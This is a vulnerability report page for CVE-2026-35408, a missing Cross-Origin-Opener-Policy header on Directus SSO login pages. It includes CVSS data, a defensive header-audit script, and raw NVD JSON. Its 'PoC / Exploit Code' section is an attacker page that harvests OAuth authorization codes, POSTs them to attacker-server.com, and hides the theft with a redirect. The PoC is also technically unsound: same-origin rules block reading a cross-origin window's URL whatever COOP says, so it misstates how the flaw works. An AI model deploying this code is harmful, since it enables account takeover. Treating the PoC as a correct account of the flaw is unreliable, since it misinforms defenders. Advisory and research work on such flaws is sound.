Security Vulnerability Report
CVE-2026-35408 CVSS 8.7 HIGH

Published: 2026-04-06 22:16:22
Last Modified: 2026-04-20 16:53:51

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus's Single Sign-On (SSO) login pages lacked a Cross-Origin-Opener-Policy (COOP) HTTP response header. Without this header, a malicious cross-origin window that opens the Directus login page retains the ability to access and manipulate the window object of that page. An attacker can exploit this to intercept and redirect the OAuth authorization flow to an attacker-controlled OAuth client, causing the victim to unknowingly grant access to their authentication provider account (e.g. Google, Discord). This vulnerability is fixed in 11.17.0.
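
As an added illustration (not code from the advisory or from Directus), the following JavaScript classifies a response's Cross-Origin-Opener-Policy header the way a post-upgrade check of the SSO login pages would: it decides whether the policy severs a cross-origin opener's handle to the page. The header value Directus 11.17.0 actually emits is not stated on this page, so `same-origin` in the constructed sample is an assumption.

```javascript
// Added example, not from the advisory or the Directus code base: decide from a
// response's headers whether Cross-Origin-Opener-Policy (COOP) severs a
// cross-origin opener's handle to the page, the property the Directus SSO
// login pages lacked before 11.17.0.

// HTTP header names are case-insensitive; look the name up accordingly.
function getHeader(headers, name) {
  const want = name.toLowerCase();
  for (const [key, value] of Object.entries(headers)) {
    if (key.toLowerCase() === want) return value;
  }
  return undefined;
}

// Returns { protected, policy, reason }. When a page is opened by a
// cross-origin window, "same-origin" and "same-origin-allow-popups" both put
// it in a new browsing context group, so the opener's handle to it is cut.
// A missing header or "unsafe-none" (the browser default) leaves it intact.
// The *-Report-Only variant only reports and is deliberately not accepted.
function assessCoop(headers) {
  const raw = getHeader(headers, 'Cross-Origin-Opener-Policy');
  if (raw === undefined) {
    return { protected: false, policy: 'unsafe-none',
             reason: 'header missing; browsers default to unsafe-none' };
  }
  // Structured-header token, optionally followed by parameters (e.g. report-to).
  const policy = raw.split(';')[0].trim().toLowerCase();
  if (policy === 'same-origin' || policy === 'same-origin-allow-popups') {
    return { protected: true, policy, reason: 'opener handle severed' };
  }
  return { protected: false, policy, reason: 'policy keeps the opener handle' };
}

// Audit a set of captured responses and return the labels that fail.
function auditSsoResponses(responses) {
  return Object.entries(responses)
    .filter(([, headers]) => !assessCoop(headers).protected)
    .map(([label]) => label);
}

// Constructed sample header sets for the /auth/login/<provider> path
// (assumed values, not captured from a real instance).
const samples = {
  'pre-fix: no COOP header': { 'Content-Type': 'text/html', 'X-Frame-Options': 'DENY' },
  'report-only is not enforcement': { 'Content-Type': 'text/html',
    'Cross-Origin-Opener-Policy-Report-Only': 'same-origin' },
  'fixed: COOP same-origin': { 'content-type': 'text/html',
    'cross-origin-opener-policy': 'same-origin; report-to="coop"' },
};

console.log('Failing responses:', auditSsoResponses(samples));
```

Point the same check at the headers of a live `/auth/login/<provider>` response after upgrading to confirm the fix is actually served through any reverse proxy in front of Directus.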

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
Weaknesses: CWE-346 (Origin Validation Error), CWE-693 (Protection Mechanism Failure)

The Raw JSON Data below also carries NVD's Primary CVSS 3.1 assessment, 9.3 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N), which rates attack complexity Low and requires user interaction; the 8.7 shown above is the Secondary assessment.

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- Attacker Page: exploit.html -->
<!DOCTYPE html>
<html>
<head>
  <title>Wait for redirect...</title>
</head>
<body>
  <h2>Please wait while we redirect you...</h2>
  <script>
    // The target Directus SSO URL
    const targetUrl = 'https://target-directus-instance.com/auth/login/google';

    // Open the Directus SSO page in a new window
    // Due to missing COOP header, this window remains accessible
    const openedWindow = window.open(targetUrl, 'DirectusLogin', 'width=500,height=600');

    // Polling loop to check if the window has been redirected back to Directus
    const checkInterval = setInterval(() => {
      try {
        // Check if the window is closed
        if (openedWindow.closed) {
          clearInterval(checkInterval);
          return;
        }
        // Access the URL of the opened window (Possible because of missing COOP)
        const currentUrl = openedWindow.location.href;
        // Look for the authorization code or state in the URL
        if (currentUrl.includes('code=')) {
          console.log('Authorization Code intercepted:', currentUrl);
          // Send the intercepted URL to the attacker's server
          fetch('https://attacker-server.com/steal', {
            method: 'POST',
            body: JSON.stringify({ url: currentUrl })
          });
          // Close the window and clear interval
          openedWindow.close();
          clearInterval(checkInterval);
          // Redirect victim to legitimate site to avoid suspicion
          window.location.href = 'https://target-directus-instance.com/admin';
        }
      } catch (e) {
        // Access might be blocked if COOP was present, but here it is not
        console.log('Waiting for user interaction...');
      }
    }, 1000);
  </script>
</body>
</html>
```

References

https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99 (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-35408", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:21.557", "lastModified": "2026-04-20T16:53:51.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus's Single Sign-On (SSO) login pages lacked a Cross-Origin-Opener-Policy (COOP) HTTP response header. Without this header, a malicious cross-origin window that opens the Directus login page retains the ability to access and manipulate the window object of that page. An attacker can exploit this to intercept and redirect the OAuth authorization flow to an attacker-controlled OAuth client, causing the victim to unknowingly grant access to their authentication provider account (e.g. Google, Discord). This vulnerability is fixed in 11.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.17.0", "matchCriteriaId": "F2EBB337-0000-4792-940F-DAEFCFC17747"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```